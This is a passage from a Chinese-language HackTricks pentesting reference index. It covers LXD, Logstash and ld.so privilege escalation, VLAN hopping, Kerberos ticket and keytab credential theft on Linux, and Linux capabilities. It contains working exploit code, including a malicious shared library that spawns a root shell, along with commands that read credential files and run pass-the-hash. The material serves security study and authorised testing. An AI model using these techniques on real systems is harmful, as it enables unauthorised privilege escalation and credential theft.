default\\nlxd init # run the image\\nlxc init myimage mycontainer -c security.privileged=true # mount the /root into the image\\nlxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » lxd/lxc Group - Privilege escalation » 方法 2","id":"1806","title":"方法 2"},"1807":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 Logstash 用于 收集、转换和分发日志 ,通过一个称为 管道 的系统。这些管道由 输入 、 过滤 和 输出 阶段组成。当 Logstash 在被攻陷的机器上运行时,会出现一个有趣的方面。","breadcrumbs":"Linux Privilege Escalation » Logstash » Logstash","id":"1807","title":"Logstash"},"1808":{"body":"管道在文件 /etc/logstash/pipelines.yml 中配置,该文件列出了管道配置的位置: yaml # Define your pipelines here. Multiple pipelines can be defined.\\n# For details on multiple pipelines, refer to the documentation:\\n# https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html - pipeline.id: main\\npath.config: \\"/etc/logstash/conf.d/*.conf\\"\\n- pipeline.id: example\\npath.config: \\"/usr/share/logstash/pipeline/1*.conf\\"\\npipeline.workers: 6 该文件揭示了包含管道配置的 .conf 文件的位置。当使用 Elasticsearch output module 时, pipelines 通常包含 Elasticsearch credentials ,这些凭据由于 Logstash 需要将数据写入 Elasticsearch,通常具有广泛的权限。配置路径中的通配符允许 Logstash 执行指定目录中所有匹配的管道。","breadcrumbs":"Linux Privilege Escalation » Logstash » Pipeline Configuration","id":"1808","title":"Pipeline Configuration"},"1809":{"body":"要尝试权限提升,首先识别 Logstash 服务运行的用户,通常是 logstash 用户。确保满足 以下 条件之一: 拥有对管道 .conf 文件的 写访问 或 /etc/logstash/pipelines.yml 文件使用了通配符,并且您可以写入目标文件夹 此外,必须满足 以下 条件之一: 能够重启 Logstash 服务 或 /etc/logstash/logstash.yml 文件中设置了 config.reload.automatic: true 鉴于配置中存在通配符,创建一个与该通配符匹配的文件可以执行命令。例如: bash input {\\nexec {\\ncommand => \\"whoami\\"\\ninterval => 120\\n}\\n} output {\\nfile {\\npath => \\"/tmp/output.log\\"\\ncodec => rubydebug\\n}\\n} 这里, interval 
决定了执行频率(以秒为单位)。在给定的示例中, whoami 命令每 120 秒运行一次,其输出被定向到 /tmp/output.log 。 在 /etc/logstash/logstash.yml 中设置 config.reload.automatic: true ,Logstash 将自动检测并应用新的或修改过的管道配置,而无需重启。如果没有通配符,仍然可以对现有配置进行修改,但建议谨慎操作以避免中断。","breadcrumbs":"Linux Privilege Escalation » Logstash » 通过可写管道进行权限提升","id":"1809","title":"通过可写管道进行权限提升"},"181":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果可以直接访问交换机,则可以绕过VLAN分段。这涉及将连接端口重新配置为干道模式,为目标VLAN建立虚拟接口,并根据场景设置IP地址(动态(DHCP)或静态)( 有关更多详细信息,请查看 https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 )。 最初,需要识别特定的连接端口。这通常可以通过CDP消息完成,或通过 include 掩码搜索端口。 如果CDP未运行,可以尝试通过搜索MAC地址进行端口识别 : SW1(config)# show mac address-table | include 0050.0000.0500 在切换到干线模式之前,应编制现有VLAN的列表,并确定它们的标识符。然后将这些标识符分配给接口,从而通过干线访问各种VLAN。例如,正在使用的端口与VLAN 10相关联。 SW1# show vlan brief 切换到干线模式需要进入接口配置模式 : SW1(config)# interface GigabitEthernet 0/2\\nSW1(config-if)# switchport trunk encapsulation dot1q\\nSW1(config-if)# switchport mode trunk 切换到 trunk 模式会暂时中断连接,但随后可以恢复。 然后创建虚拟接口,分配 VLAN ID,并激活: bash # Legacy (vconfig) – still works but deprecated in modern kernels\\nsudo vconfig add eth0 10\\nsudo vconfig add eth0 20\\nsudo vconfig add eth0 50\\nsudo vconfig add eth0 60\\nsudo ifconfig eth0.10 up\\nsudo ifconfig eth0.20 up\\nsudo ifconfig eth0.50 up\\nsudo ifconfig eth0.60 up # Modern (ip-link – preferred)\\nsudo modprobe 8021q\\nsudo ip link add link eth0 name eth0.10 type vlan id 10\\nsudo ip link add link eth0 name eth0.20 type vlan id 20\\nsudo ip link set eth0.10 up\\nsudo ip link set eth0.20 up\\nsudo dhclient -v eth0.50\\nsudo dhclient -v eth0.60 随后,通过DHCP发出地址请求。或者,在DHCP不可行的情况下,可以手动配置地址: bash sudo dhclient -v 
eth0.10\\nsudo dhclient -v eth0.20 在接口上手动设置静态IP地址的示例(VLAN 10): bash sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0\\n# or\\nsudo ip addr add 10.10.10.66/24 dev eth0.10 连接性通过向VLAN 10、20、50和60的默认网关发起ICMP请求进行测试。 最终,这个过程使得绕过VLAN分段成为可能,从而促进对任何VLAN网络的无限制访问,并为后续操作奠定基础。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » Lateral VLAN Segmentation Bypass","id":"181","title":"Lateral VLAN Segmentation Bypass"},"1810":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Logstash » References","id":"1810","title":"References"},"1811":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » ld.so 提权漏洞示例","id":"1811","title":"ld.so 提权漏洞示例"},"1812":{"body":"在以下部分中,您可以找到我们将用于准备环境的文件代码 sharedvuln.c\\nlibcustom.h\\nlibcustom.c c #include \\n#include \\"libcustom.h\\" int main(){\\nprintf(\\"Welcome to my amazing application!\\\\n\\");\\nvuln_func();\\nreturn 0;\\n} c #include void vuln_func(); c #include void vuln_func()\\n{\\nputs(\\"Hi\\");\\n} 在 您的机器上在同一文件夹中 创建 这些文件 编译 库 : gcc -shared -o libcustom.so -fPIC libcustom.c 复制 libcustom.so 到 /usr/lib: sudo cp libcustom.so /usr/lib (root 权限) 编译 可执行文件 : gcc sharedvuln.c -o sharedvuln -lcustom","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » 准备环境","id":"1812","title":"准备环境"},"1813":{"body":"检查 libcustom.so 是否从 /usr/lib 加载 ,并且您可以 执行 该二进制文件。 $ ldd sharedvuln\\nlinux-vdso.so.1 => (0x00007ffc9a1f7000)\\nlibcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000)\\nlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000)\\n/lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000) $ ./sharedvuln\\nWelcome to my amazing application!\\nHi","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » 检查环境","id":"1813","title":"检查环境"},"1814":{"body":"在这个场景中,我们将假设 某人已在 /etc/ld.so.conf/ 文件中创建了一个易受攻击的入口 : bash sudo echo \\"/home/ubuntu/lib\\" > /etc/ld.so.conf.d/privesc.conf 易受攻击的文件夹是 /home/ubuntu/lib (我们具有可写访问权限)。 下载并编译 以下代码到该路径: c //gcc -shared -o libcustom.so -fPIC libcustom.c #include \\n#include \\n#include void vuln_func(){\\nsetuid(0);\\nsetgid(0);\\nprintf(\\"I\'m the bad library\\\\n\\");\\nsystem(\\"/bin/sh\\",NULL,NULL);\\n} 现在我们已经 在错误配置的 路径中创建了恶意的 libcustom 库,我们需要等待 重启 或 root 用户执行 ldconfig ( 如果您可以作为 sudo 执行此二进制文件,或者它具有 suid 位 ,您将能够自己执行它 )。 一旦发生这种情况,请 重新检查 sharevuln 可执行文件从哪里加载 libcustom.so 库: c $ldd sharedvuln\\nlinux-vdso.so.1 => (0x00007ffeee766000)\\nlibcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000)\\nlibc.so.6 => 
/lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000)\\n/lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000) 如您所见,它是 从 /home/ubuntu/lib 加载的 ,如果任何用户执行它,将会执行一个 shell: c $ ./sharedvuln\\nWelcome to my amazing application!\\nI\'m the bad library\\n$ whoami\\nubuntu note 请注意,在这个例子中我们没有提升权限,但通过修改执行的命令并 等待 root 或其他特权用户执行易受攻击的二进制文件 ,我们将能够提升权限。","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » Exploit","id":"1814","title":"Exploit"},"1815":{"body":"在前面的例子中,我们伪造了一个错误配置,其中管理员 在 /etc/ld.so.conf.d/ 中的配置文件内设置了一个非特权文件夹 。 但是还有其他错误配置可能导致相同的漏洞,如果您在 /etc/ld.so.conf.d 中的某些 配置文件 、文件夹 /etc/ld.so.conf.d 或文件 /etc/ld.so.conf 中具有 写权限 ,您可以配置相同的漏洞并进行利用。","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » 其他错误配置 - 相同漏洞","id":"1815","title":"其他错误配置 - 相同漏洞"},"1816":{"body":"假设您对 ldconfig 具有 sudo 权限 。 您可以指示 ldconfig 从哪里加载配置文件 ,因此我们可以利用它使 ldconfig 加载任意文件夹。 所以,让我们创建加载 \\"/tmp\\" 所需的文件和文件夹: bash cd /tmp\\necho \\"include /tmp/conf/*\\" > fake.ld.so.conf\\necho \\"/tmp\\" > conf/evil.conf 现在,如 之前的漏洞 所示, 在 /tmp 中创建恶意库 。 最后,让我们加载路径并检查二进制文件从哪里加载库: bash ldconfig -f fake.ld.so.conf ldd sharedvuln\\nlinux-vdso.so.1 => (0x00007fffa2dde000)\\nlibcustom.so => /tmp/libcustom.so (0x00007fcb07756000)\\nlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000)\\n/lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000) 正如您所看到的,拥有 ldconfig 的 sudo 权限,您可以利用相同的漏洞。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » Exploit 2","id":"1816","title":"Exploit 2"},"1817":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 一台 Linux 机器也可以存在于 Active Directory 环境中。 在 AD 中的 Linux 机器可能会 在文件中存储不同的 CCACHE 票证。这些票证可以像其他任何 kerberos 票证一样被使用和滥用 。为了读取这些票证,您需要是票证的用户所有者或 root 用户。","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » Linux Active Directory","id":"1817","title":"Linux Active Directory"},"1818":{"body":"","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » Enumeration","id":"1818","title":"Enumeration"},"1819":{"body":"如果您在 Linux(或 Windows 的 bash)中访问 AD,您可以尝试 https://github.com/lefayjey/linWinPwn 来枚举 AD。 您还可以查看以下页面以了解 从 Linux 枚举 AD 的其他方法 : 389, 636, 3268, 3269 - Pentesting LDAP","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 从 Linux 进行 AD 枚举","id":"1819","title":"从 Linux 进行 AD 枚举"},"182":{"body":"前面的方法假设已获得交换机的认证控制台或Telnet/SSH访问。在实际操作中,攻击者通常连接到一个 常规接入端口 。以下的第2层技巧通常允许您在不登录交换机操作系统的情况下横向移动:","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 其他VLAN跳跃技术(无特权交换机CLI)","id":"182","title":"其他VLAN跳跃技术(无特权交换机CLI)"},"1820":{"body":"FreeIPA 是一个开源的 替代品 ,用于 Microsoft Windows Active Directory ,主要用于 Unix 环境。它结合了一个完整的 LDAP 目录 和一个 MIT Kerberos 密钥分发中心,管理方式类似于 Active Directory。利用 Dogtag 证书系统 进行 CA 和 RA 证书管理,支持 多因素 身份验证,包括智能卡。SSSD 集成用于 Unix 身份验证过程。了解更多信息: FreeIPA Pentesting","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » FreeIPA","id":"1820","title":"FreeIPA"},"1821":{"body":"","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 
玩票证","id":"1821","title":"玩票证"},"1822":{"body":"在此页面中,您将找到不同的地方,您可以 在 Linux 主机中找到 kerberos 票证 ,在以下页面中,您可以了解如何将这些 CCache 票证格式转换为 Kirbi(您在 Windows 中需要使用的格式),以及如何执行 PTT 攻击: Pass the Ticket","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » Pass The Ticket","id":"1822","title":"Pass The Ticket"},"1823":{"body":"CCACHE 文件是用于 存储 Kerberos 凭据 的二进制格式,通常以 600 权限存储在 /tmp 中。这些文件可以通过其 名称格式 krb5cc_%{uid} 进行识别,与用户的 UID 相关联。为了验证身份验证票证, 环境变量 KRB5CCNAME 应设置为所需票证文件的路径,以便启用其重用。 使用 env | grep KRB5CCNAME 列出当前用于身份验证的票证。该格式是可移植的,票证可以通过设置环境变量 重用 ,使用 export KRB5CCNAME=/tmp/ticket.ccache。Kerberos 票证名称格式为 krb5cc_%{uid},其中 uid 是用户 UID。 bash # Find tickets\\nls /tmp/ | grep krb5cc\\nkrb5cc_1000 # Prepare to use it\\nexport KRB5CCNAME=/tmp/krb5cc_1000","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 从 /tmp 重用 CCACHE 票证","id":"1823","title":"从 /tmp 重用 CCACHE 票证"},"1824":{"body":"存储在进程内存中的 Kerberos 票据可以被提取 ,特别是在机器的 ptrace 保护被禁用时(/proc/sys/kernel/yama/ptrace_scope)。一个有用的工具可以在 https://github.com/TarlogicSecurity/tickey 找到,它通过注入会话并将票据转储到 /tmp 来方便提取。 要配置和使用此工具,请按照以下步骤进行: bash git clone https://github.com/TarlogicSecurity/tickey\\ncd tickey/tickey\\nmake CONF=Release\\n/tmp/tickey -i 此过程将尝试注入到各种会话中,通过将提取的票证存储在 /tmp 中,命名约定为 __krb_UID.ccache 来指示成功。","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » CCACHE 票据重用来自密钥环","id":"1824","title":"CCACHE 票据重用来自密钥环"},"1825":{"body":"SSSD在路径 /var/lib/sss/secrets/secrets.ldb 处维护数据库的副本。相应的密钥存储为隐藏文件,路径为 /var/lib/sss/secrets/.secrets.mkey。默认情况下,只有在您具有 root 权限时,才能读取该密钥。 使用 SSSDKCMExtractor 及 --database 和 --key 参数将解析数据库并 解密秘密 。 bash git clone https://github.com/fireeye/SSSDKCMExtractor\\npython3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey 凭证缓存 Kerberos blob 可以转换为可用的 Kerberos CCache 文件,可以传递给 Mimikatz/Rubeus。","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 来自SSSD KCM的CCACHE票证重用","id":"1825","title":"来自SSSD KCM的CCACHE票证重用"},"1826":{"body":"bash git clone 
https://github.com/its-a-feature/KeytabParser\\npython KeytabParser.py /etc/krb5.keytab\\nklist -k /etc/krb5.keytab","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 从 keytab 重用 CCACHE 票证","id":"1826","title":"从 keytab 重用 CCACHE 票证"},"1827":{"body":"服务账户密钥,对于以 root 权限运行的服务至关重要,安全地存储在 /etc/krb5.keytab 文件中。这些密钥类似于服务的密码,要求严格保密。 要检查 keytab 文件的内容,可以使用 klist 。该工具旨在显示密钥详细信息,包括用户身份验证的 NT Hash ,特别是当密钥类型被识别为 23 时。 bash klist.exe -t -K -e -k FILE:C:/Path/to/your/krb5.keytab\\n# Output includes service principal details and the NT Hash 对于Linux用户, KeyTabExtract 提供了提取RC4 HMAC哈希的功能,这可以用于NTLM哈希重用。 bash python3 keytabextract.py krb5.keytab\\n# Expected output varies based on hash availability 在 macOS 上, bifrost 作为一个工具用于 keytab 文件分析。 bash ./bifrost -action dump -source keytab -path /path/to/your/file 利用提取的账户和哈希信息,可以使用工具如 crackmapexec 建立与服务器的连接。 bash crackmapexec 10.XXX.XXX.XXX -u \'ServiceAccount$\' -H \\"HashPlaceholder\\" -d \\"YourDOMAIN\\"","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 从 /etc/krb5.keytab 提取账户","id":"1827","title":"从 /etc/krb5.keytab 提取账户"},"1828":{"body":"https://www.tarlogic.com/blog/how-to-attack-kerberos/ https://github.com/TarlogicSecurity/tickey https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 参考","id":"1828","title":"参考"},"1829":{"body":"Reading time: 62 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Linux Capabilities","id":"1829","title":"Linux Capabilities"},"183":{"body":"启用DTP的Cisco交换机会乐于协商干线,如果对端声称是交换机。构造一个**DTP “desirable” 或 “trunk”**帧将接入端口转换为一个802.1Q干线,承载 所有 允许的VLAN。 Yersinia 和几个PoC自动化了这个过程: bash # Become a trunk using Yersinia (GUI)\\nsudo yersinia -G # Launch GUI → Launch attack → DTP → enabling trunking # Python PoC (dtp-spoof)\\ngit clone https://github.com/fleetcaptain/dtp-spoof.git\\nsudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable 侦察助手(被动指纹识别端口的 DTP 状态): bash sudo modprobe 8021q\\nsudo ip link add link eth0 name eth0.30 type vlan id 30\\nsudo ip addr add 10.10.30.66/24 dev eth0.30\\nsudo ip link set eth0.30 up # or wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py\\nsudo python3 dtpscan.py -i eth0 一旦端口切换到 trunk,您可以创建 802.1Q 子接口,并按照上一节所示进行 pivot。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 1. 使用动态干线协议(DTP)进行交换机欺骗","id":"183","title":"1. 
使用动态干线协议(DTP)进行交换机欺骗"},"1830":{"body":"Linux capabilities 将 root 权限划分为更小、独立的单元 ,允许进程拥有一部分权限。这通过不必要地授予完整的 root 权限来最小化风险。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Linux Capabilities","id":"1830","title":"Linux Capabilities"},"1831":{"body":"普通用户的权限有限,影响诸如打开需要 root 访问的网络套接字等任务。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 问题:","id":"1831","title":"问题:"},"1832":{"body":"Inherited (CapInh) : 目的 :确定从父进程传递下来的权限。 功能 :当创建新进程时,它从其父进程继承此集合中的权限。对于在进程生成中维护某些权限非常有用。 限制 :进程不能获得其父进程未拥有的权限。 Effective (CapEff) : 目的 :表示进程在任何时刻实际使用的权限。 功能 :这是内核检查以授予各种操作权限的权限集合。对于文件,这个集合可以是一个标志,指示文件的允许权限是否被视为有效。 重要性 :有效集合对于即时权限检查至关重要,充当进程可以使用的活动权限集合。 Permitted (CapPrm) : 目的 :定义进程可以拥有的最大权限集合。 功能 :进程可以将权限从允许集合提升到其有效集合,从而使其能够使用该权限。它还可以从其允许集合中删除权限。 边界 :它作为进程可以拥有的权限的上限,确保进程不会超过其预定义的权限范围。 Bounding (CapBnd) : 目的 :对进程在其生命周期内可以获得的权限设置上限。 功能 :即使进程在其可继承或允许集合中具有某个权限,除非它也在边界集合中,否则无法获得该权限。 用例 :此集合特别有助于限制进程的权限提升潜力,增加额外的安全层。 Ambient (CapAmb) : 目的 :允许某些权限在 execve 系统调用中保持,这通常会导致进程权限的完全重置。 功能 :确保没有关联文件权限的非 SUID 程序可以保留某些权限。 限制 :此集合中的权限受可继承和允许集合的约束,确保它们不超过进程的允许权限。 python # Code to demonstrate the interaction of different capability sets might look like this:\\n# Note: This is pseudo-code for illustrative purposes only.\\ndef manage_capabilities(process):\\nif process.has_capability(\'cap_setpcap\'):\\nprocess.add_capability_to_set(\'CapPrm\', \'new_capability\')\\nprocess.limit_capabilities(\'CapBnd\')\\nprocess.preserve_capabilities_across_execve(\'CapAmb\') 有关更多信息,请查看: https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work https://blog.ploetzli.ch/2014/understanding-linux-capabilities/","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 权限集:","id":"1832","title":"权限集:"},"1833":{"body":"","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 进程与二进制文件的能力","id":"1833","title":"进程与二进制文件的能力"},"1834":{"body":"要查看特定进程的能力,请使用 /proc 目录中的 status 文件。由于它提供了更多细节,我们将其限制为与 Linux 能力相关的信息。 
请注意,对于所有正在运行的进程,能力信息是按线程维护的,对于文件系统中的二进制文件,它存储在扩展属性中。 您可以在 /usr/include/linux/capability.h 中找到定义的能力。 您可以在 cat /proc/self/status 中找到当前进程的能力,或通过 capsh --print 查看其他用户的能力在 /proc//status 中。 bash cat /proc/1234/status | grep Cap\\ncat /proc/$$/status | grep Cap #This will print the capabilities of the current process 此命令在大多数系统上应返回 5 行。 CapInh = 继承的能力 CapPrm = 允许的能力 CapEff = 有效的能力 CapBnd = 边界集 CapAmb = 环境能力集 bash #These are the typical capabilities of a root owned process (all)\\nCapInh: 0000000000000000\\nCapPrm: 0000003fffffffff\\nCapEff: 0000003fffffffff\\nCapBnd: 0000003fffffffff\\nCapAmb: 0000000000000000 这些十六进制数字没有意义。使用 capsh 工具,我们可以将它们解码为能力名称。 bash capsh --decode=0000003fffffffff\\n0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37 现在让我们检查一下 ping 使用的 capabilities : bash cat /proc/9491/status | grep Cap\\nCapInh: 0000000000000000\\nCapPrm: 0000000000003000\\nCapEff: 0000000000000000\\nCapBnd: 0000003fffffffff\\nCapAmb: 0000000000000000 capsh --decode=0000000000003000\\n0x0000000000003000=cap_net_admin,cap_net_raw 虽然这样可以工作,但还有另一种更简单的方法。要查看正在运行的进程的能力,只需使用 getpcaps 工具,后面跟上其进程 ID (PID)。您还可以提供一个进程 ID 列表。 bash getpcaps 1234 让我们检查一下 tcpdump 的能力,在给二进制文件足够的能力(cap_net_admin 和 cap_net_raw)以嗅探网络之后( tcpdump 正在进程 9562 中运行 ): bash #The following command give tcpdump the needed capabilities to sniff traffic\\n$ setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump $ getpcaps 9562\\nCapabilities for `9562\': = cap_net_admin,cap_net_raw+ep $ cat /proc/9562/status | grep Cap\\nCapInh: 
0000000000000000\\nCapPrm: 0000000000003000\\nCapEff: 0000000000003000\\nCapBnd: 0000003fffffffff\\nCapAmb: 0000000000000000 $ capsh --decode=0000000000003000\\n0x0000000000003000=cap_net_admin,cap_net_raw 如您所见,给定的能力与获取二进制文件能力的两种方式的结果相对应。 getpcaps 工具使用 capget() 系统调用查询特定线程的可用能力。此系统调用只需提供 PID 即可获取更多信息。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 进程能力","id":"1834","title":"进程能力"},"1835":{"body":"二进制文件可以具有在执行时可以使用的能力。例如,常见的情况是找到具有 cap_net_raw 能力的 ping 二进制文件: bash getcap /usr/bin/ping\\n/usr/bin/ping = cap_net_raw+ep 您可以使用以下方法 搜索具有能力的二进制文件 : bash getcap -r / 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 二进制文件能力","id":"1835","title":"二进制文件能力"},"1836":{"body":"如果我们为 _ping* 删除 CAP*NET_RAW 能力,那么 ping 工具将不再工作。 bash capsh --drop=cap_net_raw --print -- -c \\"tcpdump\\" 除了_capsh_本身的输出,_tcpdump_命令本身也应该引发错误。 /bin/bash: /usr/sbin/tcpdump: 操作不允许 错误清楚地表明,ping命令不允许打开ICMP套接字。现在我们可以确定这按预期工作。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Dropping capabilities with capsh","id":"1836","title":"Dropping capabilities with capsh"},"1837":{"body":"您可以通过以下方式移除二进制文件的能力: bash setcap -r ","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 移除能力","id":"1837","title":"移除能力"},"1838":{"body":"显然 也可以将能力分配给用户 。这可能意味着用户执行的每个进程都将能够使用用户的能力。 根据 这个 、 这个 和 这个 的内容,需要配置一些文件以赋予用户某些能力,但分配能力给每个用户的文件将是/etc/security/capability.conf。 文件示例: bash # Simple\\ncap_sys_ptrace developer\\ncap_net_raw user1 # Multiple capablities\\ncap_net_admin,cap_net_raw jrnetadmin\\n# Identical, but with numeric values\\n12,13 jrnetadmin # Combining names and numerics\\ncap_sys_admin,22,25 jrsysadmin","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 用户能力","id":"1838","title":"用户能力"},"1839":{"body":"编译以下程序可以 在提供能力的环境中生成一个bash shell 。 ambient.c /*\\n* Test program for the ambient capabilities\\n*\\n* compile using:\\n* gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c\\n* Set effective, inherited and permitted capabilities to the 
